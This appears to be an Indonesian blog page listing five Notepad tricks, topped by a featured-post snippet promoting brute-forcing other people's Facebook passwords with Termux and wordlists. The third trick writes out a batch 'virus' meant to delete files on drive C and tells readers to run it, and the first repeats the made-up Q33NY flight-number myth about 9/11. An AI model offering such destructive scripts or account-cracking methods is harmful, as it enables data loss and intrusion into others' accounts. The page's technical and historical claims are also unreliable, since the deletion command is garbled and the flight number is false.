Skip to main content

Featured

Cara Hack FB Di Termux (panduan lengkap)

   Bisa kalian lihat pada gambar di atas, kata sandi dari akun facebook yang berhasil dihack adalah kombinasi nama+angka dan kata-kata populer seperti indonesia, sayang, doraemon, dll. Nah, apakah kalian ingin mencoba? Jika iya, maka silahkan lanjutkan membaca. Cara Kerja Termux Dalam Menghack Akun Facebook Pertama akan saya tunjukan dulu cara kerjanya. Jadi aplikasi termux akan menemukan sebuah kata sandi akun facebook dengan cara bruteforce.     brute force adalah upaya mendapatkan akses sebuah akun dengan menebak username dan password yang digunakan. Contoh kasus: Misalnya akun facebook Tanonim memakai kata sandi omcyber123. Maka agar hack berhasil, kita harus mencantumkan kata sandi omcyber123 pada file wordlist. Wordlist ini adalah file yang berisi tebakan kata sandi untuk proses bruteforce. File ini bisa dibuat manual/otomatis di termux. Kemudian kita tinggal mengoperasikan termux untuk melakukan bruteforce terhadap akun facebook Tanonim dengan file wordlist. Intinya jika tebakan

5 Trik Menarik Menggunakan Notepad

Notepad


Dalam postingan ini, saya ingin berbagi 5 trik menarik yang bisa dibuat dengan Notepad. Dan sebagaimana judul di atas, maka satu-satunya aplikasi yang anda butuhkan adalah Notepad. So, mari kita mulai dengan sesuatu yang sederhana...



1. Trik serangan terhadap World Trade Center (WTC)


Twin Tower WTC


Pada tanggal 11 September 2001, sekelompok teroris menyerang Amerika Serikat, sehingga menyebabkan menara kembar World Trade Center runtuh menjadi puing, akibat ditabrak oleh sebuah pesawat jumbo jet dengan nomor penerbangan Q33NY. Entah suatu kebetulan atau ada memang hal lain, anda akan menemukan suatu yang aneh ketika anda melakukan trik ini.


    1. Buka Notepad dan ketik “Q33N” (tanpa tanda kutip) seluruhnya dengan huruf kapital.
    2. Perbesar ukuran font menjadi 72 dengan memilih menu Format kemudian Font.
    3. Ubah jenis font menjadi Wingdings. Lihat, simbol apa yang nampak di layar anda!




2. Trik membuat Efek seperti dalam Film The Matrix


The Matrix


Saya akan menunjukkan bagaimana caranya anda dapat membuat sebuah file batch melalui Notepad, dan kemudian file tersebut  dapat menghasilkan suatu efek seperti dalam film The Matrix.

    1. Buka Notepad dan copy kode di bawah ini.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Simpan file tersebut dengan nama file Matrix.bat (Klik menu File kemudian Save As. Jangan lupa mengubah Save as Type menjadi pilihan All Files; dan pada bagian File Name, berikan nama file: Matrix.bat)
    3. Buka file tersebut dan anda akan melihat efek seperti di film The Matrix pada layar anda.




3. Membuat Virus yang dapat Memformat Drive C


Computer Virus


Menggunakan trik ini, anda akan membuat virus melalui notepad menggunakan pemrograman file batch. Virus jenis ini sangat sederhana, namun dapat menghasilkan efek yang sangat berbahaya, karena ketika file virus ini dibuka, maka ini secara otomatis akan menghapus atau memformat drive C dalam komputer anda.

    1. Buka Notepad dan copy kode di bawah ini.

@Echo off
Del C:\ *.* |y

    2. Simpan file tersebut dengan nama file: virus.bat
    3. Sekarang, buka atau jalankan file tersebut. 
(CATATAN: Saya tidak bertanggung jawab atas segala kerusakan atau kehilangan data yang terjadi pada komputer anda, sebagai akibat dari percobaan yang anda lakukan dengan menggunakan trik ini)




4. Membuat Buku Harian Personal menggunakan Notepad


Diary

Di sini, anda akan belajar bagaimana menggunakan Notepad sebagai sebuah buku harian digital atau log book untuk mencatat aktivitas harian anda, ketimbang menggunakan kertas dan alat tulis.

    1. Buka Notepad dan ketik .LOG (seluruhnya dengan huruf kapital) kemudian tekan enter
    2. Simpan file tersebut dengan nama file sesuka anda, kemudian tutup Notepad.
    3. Buka file itu lagi. Sekarang anda akan melihat tanggal dan waktu saat ini. Hal ini akan selalu berulang setiap kali anda membuka file tersebut.




5. Lampu LED Keyboard Menari-nari


LED Keyboard


Pada bagian ini, anda akan belajar bagaimana membuat lampu LED keyboard anda (lampu Num Lock, Caps Lock dan Scroll Lock) menari-nari dengan menggunakan Notepad. Untuk itu anda perlu membuat sebuah script visual basic sederhana.

    1. Buka Notepad dan copy atau salin kode di bawah ini.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

    2. Simpan file tersebut dengan nama file: dance.vbs 
    3. Sekarang, buka atau jalankan fila tersebut, dan lihatlah, lampu LED keyboard anda akan menari-nari layaknya lampu disko.
(CATATAN: Untuk mengembalikan komputer ke kondisi normal, tekan Ctrl+Alt+Del secara bersamaan, kemudian pilh Start Task Manager. Lalu pilih tab Processes kemudian pilih wscript.exe. Selanjutnya tekan Del dan pilih End Process)

Comments

Popular Posts